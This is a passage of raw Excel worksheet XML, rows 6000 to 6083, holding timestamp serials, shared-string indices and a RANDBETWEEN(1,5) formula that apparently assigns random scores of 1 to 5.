        <v>43445.047175925924</v>
      </c>
      <c r="C6000" t="s">
        <v>2108</v>
      </c>
      <c r="E6000" t="s">
        <v>5451</v>
      </c>
      <c r="F6000">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="6001" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6001" s="1">
        <v>43445.042337962965</v>
      </c>
      <c r="C6001" t="s">
        <v>3106</v>
      </c>
      <c r="E6001" t="s">
        <v>5452</v>
      </c>
      <c r="F6001">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="6002" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6002" s="1">
        <v>43445.042314814818</v>
      </c>
      <c r="C6002" t="s">
        <v>226</v>
      </c>
      <c r="E6002" t="s">
        <v>5068</v>
      </c>
      <c r="F6002">
        <f t="shared" ca="1" si="93"/>
        <v>2</v>
      </c>
    </row>
    <row r="6003" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6003" s="1">
        <v>43445.041689814818</v>
      </c>
      <c r="C6003" t="s">
        <v>2082</v>
      </c>
      <c r="F6003">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="6004" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6004" s="1">
        <v>43445.033865740741</v>
      </c>
      <c r="C6004" t="s">
        <v>2082</v>
      </c>
      <c r="F6004">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="6005" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6005" s="1">
        <v>43445.024571759262</v>
      </c>
      <c r="C6005" t="s">
        <v>2082</v>
      </c>
      <c r="F6005">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="6006" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6006" s="1">
        <v>43445.020451388889</v>
      </c>
      <c r="C6006" t="s">
        <v>10</v>
      </c>
      <c r="D6006" t="s">
        <v>312</v>
      </c>
      <c r="E6006" t="s">
        <v>5453</v>
      </c>
      <c r="F6006">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="6007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6007" s="1">
        <v>43444.998541666668</v>
      </c>
      <c r="C6007" t="s">
        <v>2082</v>
      </c>
      <c r="F6007">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="6008" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6008" s="1">
        <v>43444.99145833333</v>
      </c>
      <c r="C6008" t="s">
        <v>2082</v>
      </c>
      <c r="F6008">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="6009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6009" s="1">
        <v>43444.955706018518</v>
      </c>
      <c r="C6009" t="s">
        <v>808</v>
      </c>
      <c r="E6009" t="s">
        <v>3593</v>
      </c>
      <c r="F6009">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="6010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6010" s="1">
        <v>43444.954641203702</v>
      </c>
      <c r="C6010" t="s">
        <v>226</v>
      </c>
      <c r="E6010" t="s">
        <v>5454</v>
      </c>
      <c r="F6010">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="6011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6011" s="1">
        <v>43444.948599537034</v>
      </c>
      <c r="C6011" t="s">
        <v>2082</v>
      </c>
      <c r="F6011">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="6012" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6012" s="1">
        <v>43444.948530092595</v>
      </c>
      <c r="C6012" t="s">
        <v>2082</v>
      </c>
      <c r="F6012">
        <f t="shared" ca="1" si="93"/>
        <v>2</v>
      </c>
    </row>
    <row r="6013" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6013" s="1">
        <v>43444.944490740738</v>
      </c>
      <c r="C6013" t="s">
        <v>2082</v>
      </c>
      <c r="F6013">
        <f t="shared" ca="1" si="93"/>
        <v>3</v>
      </c>
    </row>
    <row r="6014" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6014" s="1">
        <v>43444.929363425923</v>
      </c>
      <c r="C6014" t="s">
        <v>226</v>
      </c>
      <c r="E6014" t="s">
        <v>5455</v>
      </c>
      <c r="F6014">
        <f t="shared" ca="1" si="93"/>
        <v>2</v>
      </c>
    </row>
    <row r="6015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6015" s="1">
        <v>43444.928726851853</v>
      </c>
      <c r="C6015" t="s">
        <v>10</v>
      </c>
      <c r="D6015" t="s">
        <v>6</v>
      </c>
      <c r="E6015" t="s">
        <v>776</v>
      </c>
      <c r="F6015">
        <f t="shared" ca="1" si="93"/>
        <v>2</v>
      </c>
    </row>
    <row r="6016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6016" s="1">
        <v>43444.915555555555</v>
      </c>
      <c r="C6016" t="s">
        <v>226</v>
      </c>
      <c r="E6016" t="s">
        <v>5296</v>
      </c>
      <c r="F6016">
        <f t="shared" ca="1" si="93"/>
        <v>1</v>
      </c>
    </row>
    <row r="6017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6017" s="1">
        <v>43444.907696759263</v>
      </c>
      <c r="C6017" t="s">
        <v>2082</v>
      </c>
      <c r="F6017">
        <f t="shared" ca="1" si="93"/>
        <v>5</v>
      </c>
    </row>
    <row r="6018" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6018" s="1">
        <v>43444.90457175926</v>
      </c>
      <c r="C6018" t="s">
        <v>2745</v>
      </c>
      <c r="E6018" t="s">
        <v>5068</v>
      </c>
      <c r="F6018">
        <f t="shared" ref="F6018:F6081" ca="1" si="94">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="6019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6019" s="1">
        <v>43444.896226851852</v>
      </c>
      <c r="C6019" t="s">
        <v>2082</v>
      </c>
      <c r="F6019">
        <f t="shared" ca="1" si="94"/>
        <v>2</v>
      </c>
    </row>
    <row r="6020" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6020" s="1">
        <v>43444.896226851852</v>
      </c>
      <c r="C6020" t="s">
        <v>2082</v>
      </c>
      <c r="F6020">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6021" s="1">
        <v>43444.896006944444</v>
      </c>
      <c r="C6021" t="s">
        <v>226</v>
      </c>
      <c r="E6021" t="s">
        <v>5068</v>
      </c>
      <c r="F6021">
        <f t="shared" ca="1" si="94"/>
        <v>2</v>
      </c>
    </row>
    <row r="6022" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6022" s="1">
        <v>43444.895949074074</v>
      </c>
      <c r="C6022" t="s">
        <v>226</v>
      </c>
      <c r="E6022" t="s">
        <v>5068</v>
      </c>
      <c r="F6022">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6023" s="1">
        <v>43444.890266203707</v>
      </c>
      <c r="C6023" t="s">
        <v>10</v>
      </c>
      <c r="D6023" t="s">
        <v>6</v>
      </c>
      <c r="E6023" t="s">
        <v>5243</v>
      </c>
      <c r="F6023">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6024" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6024" s="1">
        <v>43444.890208333331</v>
      </c>
      <c r="C6024" t="s">
        <v>10</v>
      </c>
      <c r="D6024" t="s">
        <v>6</v>
      </c>
      <c r="E6024" t="s">
        <v>5243</v>
      </c>
      <c r="F6024">
        <f t="shared" ca="1" si="94"/>
        <v>3</v>
      </c>
    </row>
    <row r="6025" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6025" s="1">
        <v>43444.870532407411</v>
      </c>
      <c r="C6025" t="s">
        <v>1130</v>
      </c>
      <c r="E6025" t="s">
        <v>5068</v>
      </c>
      <c r="F6025">
        <f t="shared" ca="1" si="94"/>
        <v>2</v>
      </c>
    </row>
    <row r="6026" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6026" s="1">
        <v>43444.86209490741</v>
      </c>
      <c r="C6026" t="s">
        <v>226</v>
      </c>
      <c r="E6026" t="s">
        <v>5068</v>
      </c>
      <c r="F6026">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6027" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6027" s="1">
        <v>43444.86204861111</v>
      </c>
      <c r="C6027" t="s">
        <v>226</v>
      </c>
      <c r="E6027" t="s">
        <v>5068</v>
      </c>
      <c r="F6027">
        <f t="shared" ca="1" si="94"/>
        <v>2</v>
      </c>
    </row>
    <row r="6028" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6028" s="1">
        <v>43444.849189814813</v>
      </c>
      <c r="C6028" t="s">
        <v>10</v>
      </c>
      <c r="D6028" t="s">
        <v>6</v>
      </c>
      <c r="E6028" t="s">
        <v>5243</v>
      </c>
      <c r="F6028">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6029" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6029" s="1">
        <v>43444.846412037034</v>
      </c>
      <c r="C6029" t="s">
        <v>226</v>
      </c>
      <c r="E6029" t="s">
        <v>5068</v>
      </c>
      <c r="F6029">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6030" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6030" s="1">
        <v>43444.838368055556</v>
      </c>
      <c r="C6030" t="s">
        <v>2745</v>
      </c>
      <c r="E6030" t="s">
        <v>5068</v>
      </c>
      <c r="F6030">
        <f t="shared" ca="1" si="94"/>
        <v>2</v>
      </c>
    </row>
    <row r="6031" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6031" s="1">
        <v>43444.813784722224</v>
      </c>
      <c r="C6031" t="s">
        <v>10</v>
      </c>
      <c r="D6031" t="s">
        <v>6</v>
      </c>
      <c r="E6031" t="s">
        <v>5456</v>
      </c>
      <c r="F6031">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6032" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6032" s="1">
        <v>43444.779351851852</v>
      </c>
      <c r="C6032" t="s">
        <v>10</v>
      </c>
      <c r="D6032" t="s">
        <v>11</v>
      </c>
      <c r="E6032" s="2" t="s">
        <v>5457</v>
      </c>
      <c r="F6032">
        <f t="shared" ca="1" si="94"/>
        <v>3</v>
      </c>
    </row>
    <row r="6033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6033" s="1">
        <v>43444.765370370369</v>
      </c>
      <c r="C6033" t="s">
        <v>6</v>
      </c>
      <c r="D6033" t="s">
        <v>25</v>
      </c>
      <c r="E6033" t="s">
        <v>5458</v>
      </c>
      <c r="F6033">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6034" s="1">
        <v>43444.730115740742</v>
      </c>
      <c r="C6034" t="s">
        <v>10</v>
      </c>
      <c r="D6034" t="s">
        <v>36</v>
      </c>
      <c r="E6034" t="s">
        <v>5459</v>
      </c>
      <c r="F6034">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6035" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6035" s="1">
        <v>43444.69568287037</v>
      </c>
      <c r="C6035" t="s">
        <v>60</v>
      </c>
      <c r="E6035">
        <v>764512667</v>
      </c>
      <c r="F6035">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6036" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6036" s="1">
        <v>43444.695219907408</v>
      </c>
      <c r="C6036" t="s">
        <v>60</v>
      </c>
      <c r="E6036">
        <v>762951450</v>
      </c>
      <c r="F6036">
        <f t="shared" ca="1" si="94"/>
        <v>3</v>
      </c>
    </row>
    <row r="6037" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6037" s="1">
        <v>43444.675532407404</v>
      </c>
      <c r="C6037" t="s">
        <v>10</v>
      </c>
      <c r="D6037" t="s">
        <v>271</v>
      </c>
      <c r="E6037" t="s">
        <v>5460</v>
      </c>
      <c r="F6037">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6038" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6038" s="1">
        <v>43444.670567129629</v>
      </c>
      <c r="C6038" t="s">
        <v>10</v>
      </c>
      <c r="D6038" t="s">
        <v>80</v>
      </c>
      <c r="E6038" t="s">
        <v>5461</v>
      </c>
      <c r="F6038">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6039" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6039" s="1">
        <v>43444.652743055558</v>
      </c>
      <c r="C6039" t="s">
        <v>10</v>
      </c>
      <c r="D6039" t="s">
        <v>6</v>
      </c>
      <c r="E6039" t="s">
        <v>5462</v>
      </c>
      <c r="F6039">
        <f t="shared" ca="1" si="94"/>
        <v>3</v>
      </c>
    </row>
    <row r="6040" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6040" s="1">
        <v>43444.639999999999</v>
      </c>
      <c r="C6040" t="s">
        <v>10</v>
      </c>
      <c r="D6040" t="s">
        <v>89</v>
      </c>
      <c r="E6040" s="2" t="s">
        <v>5463</v>
      </c>
      <c r="F6040">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6041" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A6041" s="1">
        <v>43444.624560185184</v>
      </c>
      <c r="C6041" t="s">
        <v>253</v>
      </c>
      <c r="D6041" t="s">
        <v>312</v>
      </c>
      <c r="E6041" s="2" t="s">
        <v>5464</v>
      </c>
      <c r="F6041">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6042" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6042" s="1">
        <v>43444.624386574076</v>
      </c>
      <c r="C6042" t="s">
        <v>10</v>
      </c>
      <c r="D6042" t="s">
        <v>112</v>
      </c>
      <c r="E6042" t="s">
        <v>5465</v>
      </c>
      <c r="F6042">
        <f t="shared" ca="1" si="94"/>
        <v>3</v>
      </c>
    </row>
    <row r="6043" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6043" s="1">
        <v>43444.620717592596</v>
      </c>
      <c r="C6043" t="s">
        <v>10</v>
      </c>
      <c r="D6043" t="s">
        <v>89</v>
      </c>
      <c r="E6043" s="2" t="s">
        <v>5466</v>
      </c>
      <c r="F6043">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6044" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6044" s="1">
        <v>43444.575891203705</v>
      </c>
      <c r="C6044" t="s">
        <v>60</v>
      </c>
      <c r="E6044">
        <v>33</v>
      </c>
      <c r="F6044">
        <f t="shared" ca="1" si="94"/>
        <v>2</v>
      </c>
    </row>
    <row r="6045" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6045" s="1">
        <v>43444.546307870369</v>
      </c>
      <c r="C6045" t="s">
        <v>10</v>
      </c>
      <c r="D6045" t="s">
        <v>107</v>
      </c>
      <c r="E6045" t="s">
        <v>5467</v>
      </c>
      <c r="F6045">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6046" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6046" s="1">
        <v>43444.536446759259</v>
      </c>
      <c r="C6046" t="s">
        <v>60</v>
      </c>
      <c r="E6046" t="s">
        <v>5468</v>
      </c>
      <c r="F6046">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6047" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6047" s="1">
        <v>43444.527303240742</v>
      </c>
      <c r="C6047" t="s">
        <v>6</v>
      </c>
      <c r="D6047" t="s">
        <v>25</v>
      </c>
      <c r="E6047" t="s">
        <v>5469</v>
      </c>
      <c r="F6047">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6048" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A6048" s="1">
        <v>43444.517407407409</v>
      </c>
      <c r="C6048" t="s">
        <v>10</v>
      </c>
      <c r="D6048" t="s">
        <v>52</v>
      </c>
      <c r="E6048" s="2" t="s">
        <v>5470</v>
      </c>
      <c r="F6048">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6049" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6049" s="1">
        <v>43444.515300925923</v>
      </c>
      <c r="C6049" t="s">
        <v>48</v>
      </c>
      <c r="E6049" s="2" t="s">
        <v>5471</v>
      </c>
      <c r="F6049">
        <f t="shared" ca="1" si="94"/>
        <v>2</v>
      </c>
    </row>
    <row r="6050" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A6050" s="1">
        <v>43444.511597222219</v>
      </c>
      <c r="C6050" t="s">
        <v>173</v>
      </c>
      <c r="E6050" s="2" t="s">
        <v>5472</v>
      </c>
      <c r="F6050">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6051" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A6051" s="1">
        <v>43444.496793981481</v>
      </c>
      <c r="C6051" t="s">
        <v>48</v>
      </c>
      <c r="E6051" s="2" t="s">
        <v>5473</v>
      </c>
      <c r="F6051">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6052" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6052" s="1">
        <v>43444.48101851852</v>
      </c>
      <c r="C6052" t="s">
        <v>10</v>
      </c>
      <c r="D6052" t="s">
        <v>263</v>
      </c>
      <c r="E6052" t="s">
        <v>5474</v>
      </c>
      <c r="F6052">
        <f t="shared" ca="1" si="94"/>
        <v>2</v>
      </c>
    </row>
    <row r="6053" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6053" s="1">
        <v>43444.480729166666</v>
      </c>
      <c r="C6053" t="s">
        <v>41</v>
      </c>
      <c r="D6053" t="s">
        <v>312</v>
      </c>
      <c r="F6053">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6054" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6054" s="1">
        <v>43444.475925925923</v>
      </c>
      <c r="C6054" t="s">
        <v>10</v>
      </c>
      <c r="D6054" t="s">
        <v>192</v>
      </c>
      <c r="E6054" t="s">
        <v>5475</v>
      </c>
      <c r="F6054">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6055" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6055" s="1">
        <v>43444.472893518519</v>
      </c>
      <c r="C6055" t="s">
        <v>10</v>
      </c>
      <c r="D6055" t="s">
        <v>494</v>
      </c>
      <c r="E6055" t="s">
        <v>5476</v>
      </c>
      <c r="F6055">
        <f t="shared" ca="1" si="94"/>
        <v>2</v>
      </c>
    </row>
    <row r="6056" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6056" s="1">
        <v>43444.459965277776</v>
      </c>
      <c r="C6056" t="s">
        <v>65</v>
      </c>
      <c r="E6056" s="2" t="s">
        <v>5477</v>
      </c>
      <c r="F6056">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6057" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6057" s="1">
        <v>43444.458078703705</v>
      </c>
      <c r="C6057" t="s">
        <v>10</v>
      </c>
      <c r="D6057" t="s">
        <v>20</v>
      </c>
      <c r="E6057" t="s">
        <v>5478</v>
      </c>
      <c r="F6057">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6058" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6058" s="1">
        <v>43444.456087962964</v>
      </c>
      <c r="C6058" t="s">
        <v>10</v>
      </c>
      <c r="D6058" t="s">
        <v>163</v>
      </c>
      <c r="E6058" t="s">
        <v>5479</v>
      </c>
      <c r="F6058">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6059" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6059" s="1">
        <v>43444.452685185184</v>
      </c>
      <c r="C6059" t="s">
        <v>60</v>
      </c>
      <c r="E6059" t="s">
        <v>5480</v>
      </c>
      <c r="F6059">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6060" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6060" s="1">
        <v>43444.444606481484</v>
      </c>
      <c r="C6060" t="s">
        <v>1510</v>
      </c>
      <c r="F6060">
        <f t="shared" ca="1" si="94"/>
        <v>3</v>
      </c>
    </row>
    <row r="6061" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6061" s="1">
        <v>43444.443622685183</v>
      </c>
      <c r="C6061" t="s">
        <v>48</v>
      </c>
      <c r="E6061" t="s">
        <v>5481</v>
      </c>
      <c r="F6061">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6062" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6062" s="1">
        <v>43444.440625000003</v>
      </c>
      <c r="C6062" t="s">
        <v>10</v>
      </c>
      <c r="D6062" t="s">
        <v>56</v>
      </c>
      <c r="E6062" t="s">
        <v>5482</v>
      </c>
      <c r="F6062">
        <f t="shared" ca="1" si="94"/>
        <v>3</v>
      </c>
    </row>
    <row r="6063" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6063" s="1">
        <v>43444.424328703702</v>
      </c>
      <c r="C6063" t="s">
        <v>60</v>
      </c>
      <c r="E6063" t="s">
        <v>5483</v>
      </c>
      <c r="F6063">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6064" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6064" s="1">
        <v>43444.416527777779</v>
      </c>
      <c r="C6064" t="s">
        <v>10</v>
      </c>
      <c r="D6064" t="s">
        <v>52</v>
      </c>
      <c r="E6064" t="s">
        <v>5484</v>
      </c>
      <c r="F6064">
        <f t="shared" ca="1" si="94"/>
        <v>2</v>
      </c>
    </row>
    <row r="6065" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6065" s="1">
        <v>43444.409363425926</v>
      </c>
      <c r="C6065" t="s">
        <v>10</v>
      </c>
      <c r="D6065" t="s">
        <v>163</v>
      </c>
      <c r="E6065" t="s">
        <v>5485</v>
      </c>
      <c r="F6065">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6066" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6066" s="1">
        <v>43444.403599537036</v>
      </c>
      <c r="C6066" t="s">
        <v>48</v>
      </c>
      <c r="E6066" t="s">
        <v>5486</v>
      </c>
      <c r="F6066">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6067" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6067" s="1">
        <v>43444.399953703702</v>
      </c>
      <c r="C6067" t="s">
        <v>10</v>
      </c>
      <c r="D6067" t="s">
        <v>713</v>
      </c>
      <c r="E6067" t="s">
        <v>811</v>
      </c>
      <c r="F6067">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6068" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6068" s="1">
        <v>43444.380324074074</v>
      </c>
      <c r="C6068" t="s">
        <v>10</v>
      </c>
      <c r="D6068" t="s">
        <v>112</v>
      </c>
      <c r="E6068" t="s">
        <v>5487</v>
      </c>
      <c r="F6068">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6069" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A6069" s="1">
        <v>43444.376932870371</v>
      </c>
      <c r="C6069" t="s">
        <v>10</v>
      </c>
      <c r="D6069" t="s">
        <v>52</v>
      </c>
      <c r="E6069" s="2" t="s">
        <v>5488</v>
      </c>
      <c r="F6069">
        <f t="shared" ca="1" si="94"/>
        <v>3</v>
      </c>
    </row>
    <row r="6070" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6070" s="1">
        <v>43444.36005787037</v>
      </c>
      <c r="C6070" t="s">
        <v>48</v>
      </c>
      <c r="E6070" t="s">
        <v>5489</v>
      </c>
      <c r="F6070">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6071" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6071" s="1">
        <v>43444.356574074074</v>
      </c>
      <c r="C6071" t="s">
        <v>71</v>
      </c>
      <c r="E6071" t="s">
        <v>5490</v>
      </c>
      <c r="F6071">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6072" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6072" s="1">
        <v>43444.316284722219</v>
      </c>
      <c r="C6072" t="s">
        <v>48</v>
      </c>
      <c r="E6072" t="s">
        <v>5491</v>
      </c>
      <c r="F6072">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6073" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6073" s="1">
        <v>43444.293067129627</v>
      </c>
      <c r="C6073" t="s">
        <v>430</v>
      </c>
      <c r="D6073" t="s">
        <v>312</v>
      </c>
      <c r="E6073" s="2" t="s">
        <v>5492</v>
      </c>
      <c r="F6073">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6074" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A6074" s="1">
        <v>43444.276064814818</v>
      </c>
      <c r="C6074" t="s">
        <v>48</v>
      </c>
      <c r="E6074" s="2" t="s">
        <v>5493</v>
      </c>
      <c r="F6074">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6075" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6075" s="1">
        <v>43444.249606481484</v>
      </c>
      <c r="C6075" t="s">
        <v>48</v>
      </c>
      <c r="E6075" t="s">
        <v>5494</v>
      </c>
      <c r="F6075">
        <f t="shared" ca="1" si="94"/>
        <v>3</v>
      </c>
    </row>
    <row r="6076" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6076" s="1">
        <v>43444.246944444443</v>
      </c>
      <c r="C6076" t="s">
        <v>65</v>
      </c>
      <c r="E6076" s="2" t="s">
        <v>5495</v>
      </c>
      <c r="F6076">
        <f t="shared" ca="1" si="94"/>
        <v>2</v>
      </c>
    </row>
    <row r="6077" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6077" s="1">
        <v>43444.228692129633</v>
      </c>
      <c r="C6077" t="s">
        <v>48</v>
      </c>
      <c r="E6077" t="s">
        <v>5496</v>
      </c>
      <c r="F6077">
        <f t="shared" ca="1" si="94"/>
        <v>5</v>
      </c>
    </row>
    <row r="6078" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6078" s="1">
        <v>43444.212569444448</v>
      </c>
      <c r="C6078" t="s">
        <v>226</v>
      </c>
      <c r="E6078" t="s">
        <v>5068</v>
      </c>
      <c r="F6078">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6079" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A6079" s="1">
        <v>43444.211643518516</v>
      </c>
      <c r="C6079" t="s">
        <v>48</v>
      </c>
      <c r="E6079" s="2" t="s">
        <v>5497</v>
      </c>
      <c r="F6079">
        <f t="shared" ca="1" si="94"/>
        <v>4</v>
      </c>
    </row>
    <row r="6080" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6080" s="1">
        <v>43444.197500000002</v>
      </c>
      <c r="C6080" t="s">
        <v>2745</v>
      </c>
      <c r="E6080" t="s">
        <v>5068</v>
      </c>
      <c r="F6080">
        <f t="shared" ca="1" si="94"/>
        <v>3</v>
      </c>
    </row>
    <row r="6081" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6081" s="1">
        <v>43444.195393518516</v>
      </c>
      <c r="C6081" t="s">
        <v>50</v>
      </c>
      <c r="E6081" t="s">
        <v>5498</v>
      </c>
      <c r="F6081">
        <f t="shared" ca="1" si="94"/>
        <v>1</v>
      </c>
    </row>
    <row r="6082" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6082" s="1">
        <v>43444.188310185185</v>
      </c>
      <c r="C6082" t="s">
        <v>226</v>
      </c>
      <c r="E6082" t="s">
        <v>5499</v>
      </c>
      <c r="F6082">
        <f t="shared" ref="F6082:F6145" ca="1" si="95">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="6083" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6083" s="1">
        <v>43444.175856481481</v>
      </c>
      <c r="C6083" t="s">
        <v>2082</v>
      </c>
      <c r="F6083">
        <f t="shared" ca="1" si="95"/>
        <v>2</v>
      </c>
    </row>
